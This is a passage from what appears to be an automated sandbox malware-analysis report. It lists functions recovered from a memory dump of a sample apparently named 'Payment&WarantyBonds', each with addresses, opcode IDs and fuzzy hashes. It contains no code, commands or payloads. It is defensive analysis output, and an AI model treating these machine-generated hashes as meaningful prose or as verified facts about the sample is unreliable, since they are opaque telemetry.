                                                                                                                                                                                • Instruction Fuzzy Hash: 374128725083169FD312DF698840A6BF7E9EF88B54F40092EFA84D7250E730DE458BA3
                                                                                                                                                                                Function 017FA020 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                                • Instruction ID: 71ed6a15bad6baa4d6f91f3ea4b6d83c331ad6e8e934d52b50c462aba193efe9
                                                                                                                                                                                • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                                • Instruction Fuzzy Hash: 80413931A00215EBDB21DE2894447BBFB72EFA0754F15806EEE49DB344E6368E80CB90
                                                                                                                                                                                Function 018009AD Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d80906eccd9d0744b762d255277d1ca9caa2574f27fb7de91730944f90fda57c
                                                                                                                                                                                • Instruction ID: 474846c45a222cf07ff1dad92baddd5fd1b8ac3ddac62940a6ea4b9183763d4d
                                                                                                                                                                                • Opcode Fuzzy Hash: d80906eccd9d0744b762d255277d1ca9caa2574f27fb7de91730944f90fda57c
                                                                                                                                                                                • Instruction Fuzzy Hash: E9418E71600709EFD362DF18C840B26BBF5FF54354F20866AE449CB291E770EA41CB91
                                                                                                                                                                                Function 01830710 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                                                • Instruction ID: 5a208b1ae0f0ee1cd251b19e7953758ed6591bb4d4463a835590bcaf13b19ab6
                                                                                                                                                                                • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                                                • Instruction Fuzzy Hash: 63413871A00609EFDB25CF98C980AAABBF9FF58704B14496DE556DB251D330EA44CF90
                                                                                                                                                                                Function 0180262C Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: becc3c02a5228aacad308388bead1d9e4bc12906159e988781e5283788e1d427
                                                                                                                                                                                • Instruction ID: ededa6bb355c8fffaab1bf9c1ba6f3955baee0e4cd6633fd2d6e1b6dc11fc67b
                                                                                                                                                                                • Opcode Fuzzy Hash: becc3c02a5228aacad308388bead1d9e4bc12906159e988781e5283788e1d427
                                                                                                                                                                                • Instruction Fuzzy Hash: 6D418C71901709DFCBA2EF28CD44A65B7B2FF44314F24826DC916DB2A1EB70AB41CB52
                                                                                                                                                                                Function 0183C8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5e460855634da394127c07211ca01255cdc24650a56f6027443222dcdbbf8cb6
                                                                                                                                                                                • Instruction ID: 94e087be24b7f3fa309f4faded1594a10a9e6525cecf099ac66280cdd1fbb0f5
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e460855634da394127c07211ca01255cdc24650a56f6027443222dcdbbf8cb6
                                                                                                                                                                                • Instruction Fuzzy Hash: 5A3199B2A00345DFDB11CF68C040B99BBF0FB49724F2581AED519EB251D3769A02CF90
                                                                                                                                                                                Function 018807C3 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a178f04b11f6a711cdc35b8caf9b55f5a576a447cb2467c6f7a031feda50e48f
                                                                                                                                                                                • Instruction ID: 840124fc6e4bfd73ccab0cb86591177c7dd3ab0444b2fae14305f562b3f752b7
                                                                                                                                                                                • Opcode Fuzzy Hash: a178f04b11f6a711cdc35b8caf9b55f5a576a447cb2467c6f7a031feda50e48f
                                                                                                                                                                                • Instruction Fuzzy Hash: A7418DB15183059FD320EF29C845B9BBBE8FF88754F004A2EF598D7251DB709A44CB92
                                                                                                                                                                                Function 017F80A0 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cab8f8121228823466f0357241bfce6f6ef55a2f956f522f16b30ea99c6bb778
                                                                                                                                                                                • Instruction ID: 594a4fc694d89993cccb389d43f9484c27d829e08b0fef180718edb66c6d460b
                                                                                                                                                                                • Opcode Fuzzy Hash: cab8f8121228823466f0357241bfce6f6ef55a2f956f522f16b30ea99c6bb778
                                                                                                                                                                                • Instruction Fuzzy Hash: A341D071A0561AAFDB01DF58C8806AAF7B1FB14760F24832DEA15A7380DB30ED418B92
                                                                                                                                                                                Function 018805A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4ae30bd78418ba7af123080e6b15459d4d229fe394423e67675018a9b5bb7728
                                                                                                                                                                                • Instruction ID: c6dc899456f08a9b99d110ac811d138804dbbf32deeeb720855be8283f5b4976
                                                                                                                                                                                • Opcode Fuzzy Hash: 4ae30bd78418ba7af123080e6b15459d4d229fe394423e67675018a9b5bb7728
                                                                                                                                                                                • Instruction Fuzzy Hash: D041A2726087469FD320EF6CC840A6AB7E9FFC8704F144619F994D7680E730EA09C7A6
                                                                                                                                                                                Function 01804859 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 02b5d9a0b174f0afe2bdad0e74c626aade8d29459e4d8a288238aaeb3642091e
                                                                                                                                                                                • Instruction ID: a5cc6b22496805f1b9963d6e8dc4fe3ecf712370a9ab593c21aa8e3671eaa058
                                                                                                                                                                                • Opcode Fuzzy Hash: 02b5d9a0b174f0afe2bdad0e74c626aade8d29459e4d8a288238aaeb3642091e
                                                                                                                                                                                • Instruction Fuzzy Hash: A24191716443098FD766DF1CDC84B26BBAAAF80354F14457DE645C72E1D730DA41CB51
                                                                                                                                                                                Function 017F8B50 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 980e8724d0535b4c0233d5c425c541f5bc9bfaf31002a9df6257b48f00374fdd
                                                                                                                                                                                • Instruction ID: dfc959cd6adf0d375165bf472cbeb96cfcd547553d81d876a0774bc2c5079024
                                                                                                                                                                                • Opcode Fuzzy Hash: 980e8724d0535b4c0233d5c425c541f5bc9bfaf31002a9df6257b48f00374fdd
                                                                                                                                                                                • Instruction Fuzzy Hash: F1416D71A01609DFCB15CF69C980A9EF7F2FF98320B1486AED666E7390DB349941CB41
                                                                                                                                                                                Function 018102E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                                • Instruction ID: f6c25ac77bc0ee426caa4046d7c7c4364db400f6b3f3687b98a6f68b53ce81ec
                                                                                                                                                                                • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                                • Instruction Fuzzy Hash: FD311832A04248AFDB228B6CCC40B9FBFEDAF14354F044565F855D739AC6749A84CBA1
                                                                                                                                                                                Function 018AE3DB Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: eba3d89ee8150931152e5d65ffc13a51ad25a1b1c553cd7c565c175fdb22c3ca
                                                                                                                                                                                • Instruction ID: f2019904e37eafffa0b57b059864731e70758578bbd8acc658aefd020d3bf51d
                                                                                                                                                                                • Opcode Fuzzy Hash: eba3d89ee8150931152e5d65ffc13a51ad25a1b1c553cd7c565c175fdb22c3ca
                                                                                                                                                                                • Instruction Fuzzy Hash: 0731BC35741716ABE7229F598C81FAB76FCAF59B50F400428FA00EB291DAA4DE01C7D1
                                                                                                                                                                                Function 018B4B4B Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 48512530463702a05da66cffb8e762abeda625857b99c3e2224ed55845aa5257
                                                                                                                                                                                • Instruction ID: 7d929c25758a559527d2c68ea375e2fa0e17ddb0653edbe4c3330e62800ab07d
                                                                                                                                                                                • Opcode Fuzzy Hash: 48512530463702a05da66cffb8e762abeda625857b99c3e2224ed55845aa5257
                                                                                                                                                                                • Instruction Fuzzy Hash: A5318E326052018FC321DF1DD8D1EA6B7E6FB84760F29446DE996CB356EB31AA40CF91
                                                                                                                                                                                Function 01804260 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7901c952d4d1f383a7a847ca6851e48691d17c1658b32fe67dd32fee3117d681
                                                                                                                                                                                • Instruction ID: 91b84fe26c94869200a638259e9f3a02ecaed66ec54a4bf14b15f5ee3e9467d9
                                                                                                                                                                                • Opcode Fuzzy Hash: 7901c952d4d1f383a7a847ca6851e48691d17c1658b32fe67dd32fee3117d681
                                                                                                                                                                                • Instruction Fuzzy Hash: 8241BE71200B499FC763CF68C880F96BBE9AF45714F11882DE699CB390C734EA04CB50
                                                                                                                                                                                Function 018B4BB0 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f8f872cbd6ac8b42ac64ab2cfdd144c8031196baa0ebf438432647302c15bbfa
                                                                                                                                                                                • Instruction ID: 4bed1b94a0a76fc47ac860e9767e21e49b010f604e81c7f00ecaa1c5da3fc4d2
                                                                                                                                                                                • Opcode Fuzzy Hash: f8f872cbd6ac8b42ac64ab2cfdd144c8031196baa0ebf438432647302c15bbfa
                                                                                                                                                                                • Instruction Fuzzy Hash: BD317E716042018FD320DF28C8D1EAAB7E5FB84B10F19456DF996DB396E730EA04CB92
                                                                                                                                                                                Function 0187EB1D Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4d75d6e5ff732442e4abfa0bff5552354857cc722f65a389a12c83b0d11eeea7
                                                                                                                                                                                • Instruction ID: f866d108f460ad35062c6aa8b339e0bc2c5466c9ab01840ccaf8f6f5cc3aed35
                                                                                                                                                                                • Opcode Fuzzy Hash: 4d75d6e5ff732442e4abfa0bff5552354857cc722f65a389a12c83b0d11eeea7
                                                                                                                                                                                • Instruction Fuzzy Hash: 9C31D1323016869BF326976CCE48B257FD9BB51B44F1D00E0AF85EB6D2DB28DA41C231
                                                                                                                                                                                Function 018C61C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b59c5d7356a8e04f7404bc26dfb2c3b943d5f64a6e99340e271aca5cc8011c17
                                                                                                                                                                                • Instruction ID: 686a390b3f6e7387c7f7b9efe84a63a2f462a19d6e272efcfa350570d6bc54d4
                                                                                                                                                                                • Opcode Fuzzy Hash: b59c5d7356a8e04f7404bc26dfb2c3b943d5f64a6e99340e271aca5cc8011c17
                                                                                                                                                                                • Instruction Fuzzy Hash: 1E319276A0015AABDB15DF98C840FAEB7B6EB48B40F554169E900EB344E770EE41CB94
                                                                                                                                                                                Function 018A483A Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d4a8d71f21a3c4d11d0f36f1f43dd2a7e5e2db7426155d06d737d73f23d555a0
                                                                                                                                                                                • Instruction ID: 68c9cbd8e6677cf3fb59429f8055593c61eeb455b4a99c2d7e9b57eb39e02219
                                                                                                                                                                                • Opcode Fuzzy Hash: d4a8d71f21a3c4d11d0f36f1f43dd2a7e5e2db7426155d06d737d73f23d555a0
                                                                                                                                                                                • Instruction Fuzzy Hash: 28315576A4112DABDF21DF58DC44BDEBBB9AB98310F1800A5A508E7260DB70DF918F91
                                                                                                                                                                                Function 0182EB20 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3cee64466b2c22ee4475540f9a0851e61d13c1f40c88dfb552fa1e076fda3ec7
                                                                                                                                                                                • Instruction ID: bd07f52f406440d20e70e0ad9c851a97053a9fb720fddd8e3edb60565feb21df
                                                                                                                                                                                • Opcode Fuzzy Hash: 3cee64466b2c22ee4475540f9a0851e61d13c1f40c88dfb552fa1e076fda3ec7
                                                                                                                                                                                • Instruction Fuzzy Hash: FF31C772E00229AFDB22DFADCC40AAEBBF9EF58750F114425E915E7250D6709F408BA5
                                                                                                                                                                                Function 018C60B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: db69dc7b5f8886334202a3260152f6f7a4952192c3d79d5347f9d1c1626b9300
                                                                                                                                                                                • Instruction ID: 2d9ff91305990e09682fd732953c73ba1422bc555c794287b0807bfbe0a60544
                                                                                                                                                                                • Opcode Fuzzy Hash: db69dc7b5f8886334202a3260152f6f7a4952192c3d79d5347f9d1c1626b9300
                                                                                                                                                                                • Instruction Fuzzy Hash: A831D872600A06EFD7129F5DC890B6A77B9AF94B54F20407EE505EB342EA30DF018B91
                                                                                                                                                                                Function 018007AF Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2073290d70633e838a502545364864290bd24d4f2ebcd8dfdf04624e4443e5c3
                                                                                                                                                                                • Instruction ID: 490a841c976fcaf7c6f9a52a38bd33c8faf04576718cb0253aceeecbc42b0845
                                                                                                                                                                                • Opcode Fuzzy Hash: 2073290d70633e838a502545364864290bd24d4f2ebcd8dfdf04624e4443e5c3
                                                                                                                                                                                • Instruction Fuzzy Hash: F231AF72A0461A9BC753DE288C80A6BBBA5BB943A0F014529FD59D7391DA30DF1187E2
                                                                                                                                                                                Function 01808550 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0a5ee1d302a4c73d76d0b6eb8ab621c5f9989a3f69266b2d2a89765ed8a5f5aa
                                                                                                                                                                                • Instruction ID: 8e14669f1835454d99253958ff7043624aef5de7cb33b5d2df1fad4205b7feaa
                                                                                                                                                                                • Opcode Fuzzy Hash: 0a5ee1d302a4c73d76d0b6eb8ab621c5f9989a3f69266b2d2a89765ed8a5f5aa
                                                                                                                                                                                • Instruction Fuzzy Hash: 09319E71A093018FE761CF19C840B1ABBEAFB88700F0549ADF984D7391D771EA44CB92
                                                                                                                                                                                Function 0183A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                                                • Instruction ID: 934c382b8d6d1617874aa4d387498140bd62812861a89fa833e44f7a60b7e0c1
                                                                                                                                                                                • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                                                • Instruction Fuzzy Hash: C0312E72B04B01AFE765CF6DDD81B57BBF8AB48B50F18452DA5DAC3650E630EA008B90
                                                                                                                                                                                Function 018AEBD0 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0dea94fdde52f051d622b0d8a7082fc9c346fc5ac579d70ef876f7742d1a64cb
                                                                                                                                                                                • Instruction ID: 8cc970b11bb21e4b238509105682605149b779d73d51fe78da75d69657683479
                                                                                                                                                                                • Opcode Fuzzy Hash: 0dea94fdde52f051d622b0d8a7082fc9c346fc5ac579d70ef876f7742d1a64cb
                                                                                                                                                                                • Instruction Fuzzy Hash: ED317A715153028FCB11EF19C58095ABBF6FF89318F444AAEE588DB351E331AA44CB92
                                                                                                                                                                                Function 0182438F Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1b19f70a9fcf7b4bc5e3efad5442966f23773c278ef2ec2e2c65c9d81dec7f70
                                                                                                                                                                                • Instruction ID: a8ebc43b4140b7bf132e704d450ec801c4d5dbde28906e7e6dd2d037059d328c
                                                                                                                                                                                • Opcode Fuzzy Hash: 1b19f70a9fcf7b4bc5e3efad5442966f23773c278ef2ec2e2c65c9d81dec7f70
                                                                                                                                                                                • Instruction Fuzzy Hash: 5531F432B116159FD721DFA8C980E6EBBF9AF80308F108529D106D3255E730DF81CBA1
                                                                                                                                                                                Function 017FCB7E Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                                                • Instruction ID: abd0c50a36f36d2a23c02331af114cddcee7b5b6e7807aab3a593bdfb834d42c
                                                                                                                                                                                • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                                                • Instruction Fuzzy Hash: 62210136E4025EAADB119BB98851BEFFBB9EF14740F0581799E15EB340E270CA00C7A0
                                                                                                                                                                                Function 017FC156 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
